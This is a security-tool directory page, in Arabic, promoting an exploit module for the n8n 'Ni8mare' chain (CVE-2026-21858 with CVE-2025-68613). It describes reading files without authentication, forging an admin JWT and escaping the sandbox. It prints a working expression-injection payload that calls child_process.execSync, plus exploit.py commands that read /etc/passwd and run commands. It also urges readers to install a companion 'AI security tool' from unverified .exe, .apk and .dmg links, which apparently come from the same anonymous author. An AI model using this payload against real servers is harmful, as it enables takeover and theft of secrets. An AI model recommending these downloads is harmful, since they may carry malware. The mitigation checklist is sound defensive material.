Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-21858-n8n-FullChain — 🛡️ وحدة أداة أمن الذكاء الاصطناعي الرسمية لـ CVE-2026-21858 + CVE-2025-68613 (سلسلة كاملة لقراءة الملفات التعسفية غير المصادق عليها وحقن التعبيرات عن بُعد RCE في n8n "Ni8mare"). | Kitploit
أدوات/GitHubGitHub/zerodayevil/cve-2026-21858-n8n-fullchain
ماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالأمن الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
أمن الذكاء الاصطناعي
GitHubzerodayevil/cve-2026-21858-n8n-fullchain

CVE-2026-21858-n8n-FullChain

🛡️ وحدة أداة أمن الذكاء الاصطناعي الرسمية لـ CVE-2026-21858 + CVE-2025-68613 (سلسلة كاملة لقراءة الملفات التعسفية غير المصادق عليها وحقن التعبيرات عن بُعد RCE في n8n "Ni8mare").

عرض المستودع
منذ 14س 10دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ وحدة أداة الأمن بالذكاء الاصطناعي
سلسلة n8n الكاملة (CVE-2026-21858 + CVE-2025-68613) — "Ni8mare"

وحدة تدقيق أمني رسمية لمنظومة أداة الأمن بالذكاء الاصطناعي


Latest Release Build Status Donations Telegram Channel

License

🌐 عرض توضيحي على الويب • 📚 موقع المشروع • 💬 دردشة المجتمع

تنقل الموقع: الرئيسية • التحديثات • التنزيلات • الوحدات

AI Security Tool Banner


🧠 نظرة مفاهيمية عامة

توفر هذه الوحدة أدوات تشخيصية وسلسلة استغلال كاملة لنسخ n8n لأتمتة سير العمل، والتي تُلقب بـ Ni8mare.

تجمع سلسلة الهجوم بين قراءة ملفات عشوائية دون مصادقة (CVE-2026-21858) الناتجة عن التباس نوع المحتوى (Content-Type confusion) مع تجاوز صندوق حماية حقن التعبيرات بعد المصادقة (CVE-2025-68613). من خلال إرسال طلب Content-Type: application/json مُتلاعب به إلى نموذج رفع ملفات مكشوف، يتحكم المهاجم في وسيط filepath لقراءة ملفات النظام الداخلية (/proc/self/environ، والإعدادات، وقاعدة بيانات SQLite). يسمح encryptionKey المستخرج وتجزئة كلمة المرور بتزوير ملف تعريف ارتباط JWT الخاص بالمسؤول دون اتصال. وبمجرد المصادقة، يفلت حقن التعبيرات عبر this.process.mainModule.require من صندوق حماية JavaScript لتنفيذ أوامر نظام عشوائية.

🎯 فلسفة التأثير الجوهري

"من قراءة الملفات إلى السيطرة الكاملة على النظام في ثلاث خطوات."
بينما تتطلب قراءة الملفات سير عمل نموذج نشط بإخراج ثنائي، يعمل حقن التعبيرات بشكل موثوق على تثبيتات n8n الافتراضية دون الحاجة إلى عقد خاصة أو تمكين أذونات نظام صريحة.

📊 مواصفات الثغرة

المواصفةالقيمة المعينةملاحظات
معرّفات CVECVE-2026-21858 + CVE-2025-68613السلسلة الكاملة: قراءة ملفات دون مصادقة إلى تنفيذ أوامر عن بُعد
تصنيف الخطورةحرجة (CVSS v3.1: 10.0 + 9.9)سلسلة تنفيذ أوامر عن بُعد دون مصادقة
أنواع الثغراتCWE-200 / CWE-94التباس نوع المحتوى / حقن الشيفرة
المكوّن المتأثرمحرك أتمتة سير العمل n8nالإصدارات <= 1.65.0 (AFR) / >= 0.211.0 (RCE)
الإصدارات المُرقّعة1.121.0 (AFR) / 1.120.4+ (RCE)تم إصدار تصحيحات رسمية من المورّد
الصلاحيات المطلوبةلا شيءوصول أولي دون مصادقة عبر نموذج عام

🕸 سيناريو الهجوم والبنية

root@kitploit:~
graph TD
    A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
    B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
    C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
    D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
    E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
    F -->|6. Execute Command| G[Full Remote Code Execution]

💻 حمولة حقن التعبيرات

root@kitploit:~
={{ (function() {
  var require = this.process.mainModule.require;
  var execSync = require("child_process").execSync;
  return execSync("id").toString();
})() }}

🛡 قائمة التحقق من التخفيف

  • 🟢 الترقية فورًا: حدّث نسخ n8n إلى الإصدار 1.121.0 أو أعلى.
  • 🟢 تقييد محفزات سير العمل: عطّل نماذج سير العمل العامة دون مصادقة أو فرض تحقق صارم من الملفات.
  • 🟡 تكوين قيود التنفيذ: اضبط N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true وقيّد قدرات العمليات في حاويات Docker.

💻 كيفية تشغيل هذه الوحدة

⚠️ مهم: تم بناء هذه الوحدة خصيصًا للتنفيذ الآمن والتشخيص ضمن منظومة أداة الأمن بالذكاء الاصطناعي. استخدم دائمًا وحدات موثّقة من مستودعات رسمية.

1️⃣ تثبيت أداة الأمن بالذكاء الاصطناعي

لتنفيذ نصوص المراقبة والتشخيص، تأكد من تثبيت المحرك الأساسي لأداة الأمن بالذكاء الاصطناعي:

نظام التشغيل / المنصةالإصدارالبنية / الصيغةتاريخ الإصدارالحالةرابط التنزيل
🪟 Windowsv6.3.20x64 Installer (.exe)2026-09-08🟢 الأحدثتنزيل .exe
🪟 Windowsv6.3.20x64 Portable (.tar.gz)2026-09-08🟢 الأحدثتنزيل .tar.gz
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 مستقرتنزيل .dmg
🐧 Linuxv5.3.27Universal x64 (.tar.gz)2026-09-01🟢 مستقرتنزيل .tar.gz
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 مستقرتنزيل .apk

2️⃣ التنفيذ من الطرفية

root@kitploit:~
# Read arbitrary file via diagnostic module
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwd

Execute full attack chain with custom command

uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"


🔍 وحدات التدقيق الأمني ومستودعات إثبات المفهوم

وحدات فحص الثغرات، ونصوص إثبات المفهوم، ومستودعات البحث التي يصونها مجتمعنا:

🔥 تنفيذ الأوامر عن بُعد (RCE) وثغرات الشبكة 5 وحدات
  • CVE-2026-21858 — سلسلة n8n الكاملة لتنفيذ الأوامر عن بُعد دون مصادقة (Ni8mare) @ZeroDayEvil
  • CVE-2026-41089 — استغلال تنفيذ الأوامر عن بُعد في Netlogon @ZeroDayEvil
  • CVE-2026-20805 — إثبات مفهوم تنفيذ الأوامر عن بُعد في Windows @ZeroDayEvil
  • CVE-2026-41096 — وحدة فحص ثغرة تنفيذ أوامر عن بُعد حرجة @ZeroDayEvil
  • CVE-2026-24291 — تنفيذ الأوامر عن بُعد عبر بروتوكول الشبكة @ZeroDayVPN
🛡️ رفع الصلاحيات (EoP) والخدمات 3 وحدات
  • CVE-2026-54121 — انتحال هوية وحدة تحكم المجال AD CS Certighost @ZeroDayEvil
  • CVE-2026-66804 — رفع الصلاحيات في خدمة CrossDevice @ZeroDayVPN
  • CVE-2026-50416 — تحليل وإثبات مفهوم رفع الصلاحيات المحلي @ZeroDayEvil
📚 أبحاث الثغرات والتحليلات وحدتان
  • CVE-2026-42978 — تحليل تقني معمّق وأبحاث إثبات المفهوم @ZeroDayEvil
  • CVE-2026-83991 — تحليل كامل وعرض توضيحي للاستغلال @ZeroDayVPN

⚖️ الترخيص وإخلاء المسؤولية القانونية

🚨 إخلاء المسؤولية

تُقدَّم هذه الأداة والتحليل التقني حصريًا لتدقيق الأنظمة المصرّح به، والبحث، واختبار الاختراق.
تنفيذ سلاسل الاستغلال ضد أهداف غير مصرّح بها غير قانوني. لا يتحمل المؤلفون أي مسؤولية عن الوصول غير المصرّح به، أو فقدان البيانات، أو تعطّل الأنظمة. اعمل ضمن نطاق مصرّح به فقط.

🔄 المساهمة والمجتمع

نرحب بمساهمات مجتمع أبحاث الأمن! مجالات المساهمة الرئيسية:

  1. تكاملات الذكاء الاصطناعي: إضافة مزوّدي LLM جدد وتطوير وكلاء أمنيين متخصصين.
  2. أدوات الأمن: تطوير وحدات الثغرات ودمج ماسحات CLI.
  3. التحسين: تعزيز سرعة المحلل، وسلامة التنفيذ، ومنطق التخزين المؤقت.
  4. التوثيق: كتابة أوراق بحثية وأدلة وترجمات محلية.

🔗 التواصل والدعم

  • الموقع الرسمي: ZeroDayEvil.com
  • البحث الأصلي: Cyera Ni8mare Write-up
  • مسؤول Telegram: @ZeroDayEvil
  • دردشة Telegram: @ZeroDyaTool_chat
  • قناة Telegram: @ZeroDyaTool_channel
  • رعاية المشروع: تبرعات PayPal
  • Open Collective: opencollective.com/ZeroDayEvil

أداة الأمن بالذكاء الاصطناعي — إعادة تصور سير عمل الطرفية والأتمتة لمتخصصي الأمن السيبراني.

تنزيل الأداة